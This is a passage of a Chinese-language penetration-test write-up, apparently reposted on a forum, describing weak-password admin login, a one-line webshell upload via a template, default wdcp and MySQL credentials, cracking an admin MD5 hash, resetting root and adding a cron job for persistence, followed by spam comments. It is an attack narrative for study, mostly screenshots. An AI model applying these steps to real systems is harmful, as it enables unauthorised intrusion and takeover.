    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">尝试一波弱口令,<span style="color: black;">经过</span></span><span style="color: black;">admin:123456</span><span style="color: black;">进入后台</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyiaJCEBaRAGZbVzIic3owcDS6kS4p2CZcia4vhbEoNLNice0HDMqJD5nD8w/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyRE3sOpoJATy25aQ7EI6xLD909UVQrIiaPsOpxH66ibSRAlL9aoZxG5tg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">下载一个正常模板放一句话进去上传<span style="color: black;">运用</span><span style="color: black;">就可</span>。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCwV7zaKviaUAnLsiaEvsXSCdp6jYIF6BJZa1MOyF3FvA94hZ0SSNL8Yg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>7<span style="color: black;">Privilege Escalation</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">常规试了下</span><span style="color: black;">sudo</span><span style="color: black;">、</span><span style="color: black;">suid</span><span style="color: black;">提权,</span><span style="color: black;">msfbind</span><span style="color: black;"><span style="color: black;">亦</span>拿不到</span><span style="color: black;">shell</span><span style="color: black;">,<span style="color: black;">因此</span><span style="color: black;">瞧瞧</span>还有什么提权<span style="color: black;">办法</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><span style="color: black;">发掘</span>开了</span><span style="color: black;">8080</span><span style="color: black;">端口是个</span><span style="color: black;">wdcp</span><span style="color: black;">服务器,默认<span style="color: black;">秘码</span>登陆失败</span><span style="color: black;">admin:wdlinux.cn</span><span style="color: black;">,<span style="color: black;">然则</span></span><span style="color: black;">mysql</span><span style="color: black;">的默认<span style="color: black;">秘码</span>没改,还是上面那个。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">www.target.com:8080/phpmyadmin</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyYDoFc3u4qjXBXicsADAqPCfwqvhoesUooicoRriasUCUUPUW3Ctc9eSbA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">默认<span style="color: black;">秘码</span>登陆上去后<span style="color: black;">能够</span>看到</span><span style="color: black;">:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttynfO6Uibp0yx2yaUNn2bNhZ5ziaotuXeTVdTkGrGCJEibL2M3dicgqIuPbA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">找到管理员<span style="color: black;">秘码</span>,</span><span style="color: black;">md5</span><span style="color: black;">解开后登陆上主面板<span style="color: black;">就可</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyD4ibe8ppzDN6JyZ0P9wJD2YK58vZCM2VIRwCD8gNLUGSNcjo58mN1Kw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">功能是真的全,还能改</span><span style="color: black;">root</span><span style="color: black;"><span style="color: black;">秘码</span>,直接提权<span style="color: black;">就可</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttysJicTIiaYgV4f8ErJCAS4DBqZGP0dNxhfIPNLX6KQ6Q9TgaDOw7pzicXw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><span style="color: black;">亦</span><span style="color: black;">能够</span>加个计划任务,收工</span><span style="color: black;">~</span></span></p>8<span style="color: black;">
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">关注公众号</p>
    </span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;">关注本公众号 不<span style="color: black;">定时</span>更新<span style="color: black;">文案</span>和视频</span></strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;">欢迎前来关注</span></strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_jpg/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty35FYyIIC8bDxGqpl4zmKpb7Z5QB14NVjrWzhuyRYaSl4NAhmich1nibg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>




nykek5i 发表于 2024-10-17 07:23:44

可以发布外链的网站 http://www.fok120.com/

7wu1wm0 发表于 2024-11-9 00:51:50

感谢您的精彩评论,为我带来了新的思考角度。

b1gc8v 发表于 昨天 18:07

你的见解真是独到,让我受益匪浅。
页: [1]
查看完整版本: 记一次代码审计的Linux内网渗透